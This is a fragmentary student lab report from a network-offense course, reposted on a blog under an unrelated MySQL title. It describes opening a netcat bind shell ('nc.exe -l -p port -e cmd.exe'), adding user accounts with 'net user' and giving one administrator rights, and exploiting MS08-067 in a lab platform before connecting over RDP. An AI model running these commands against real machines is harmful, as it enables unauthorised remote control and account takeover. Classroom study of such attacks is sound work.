mysql实验 告4代码_实验 告4

中国人民公安大学

Chinese people’public security university

络对抗技术

实验 告

实验四

恶意代码技术

学生姓名

陈昊

年级

2014

区队

六区队

指导教师

高见

任务一 利用NC控制电脑

NetCat,具有 络军刀之称,它小巧精悍且功能强大,说它小巧精悍,是因为他的软件大小现在已经压缩到只有十几KB,而且在功能上丝毫不减。

实验过程需要两个同学相互配合完成:

步骤一:

在受害者的机器 (同学A)

输入下面的命令:

nc.exe -l -p port -e cmd.exe   进入监听模式

步骤三:

在shell中,利用net user 用户名 密码 /add ,添加一个用户,并在受害者的机器中使用 net user 命令进行验证。(需要截图)

2.屏幕控制,尝试获取桌面

不知道为什么失败了好几次之后换了台电脑才成功,可能与前一个实验发生了冲突

4.会话管理,重启对方机器,查看是否能自启动上线

未成功

会话管理,卸载对方的木马。

任务三 通过漏洞获取shell(合天平台中做) 所有过程截图写博客

windows ms08067 漏洞利用

在平台中获取shell之后,继续利用攻击机器使用

net user user pass /add

net localgroup administrators /add

命令向被攻击的机器中添加账户,并提升为管理员

然后用rdesktop 10.1.1.130 登陆对方的远程桌面

f6595089f0eeb8d046d20a5063df189e.png

文章知识点与官方知识档案匹配,可进一步学习相关知识MySQL入门技能树首页概览31497 人正在系统学习中 相关资源:橘子快速启动软件(橘子启动器)v3.0绿色免费版-其它代码类资源…

声明:本站部分文章及图片源自用户投稿,如本站任何资料有侵权请您尽早请联系jinwei@zod.com.cn进行处理,非常感谢!

上一篇 2021年1月26日
下一篇 2021年1月26日

相关推荐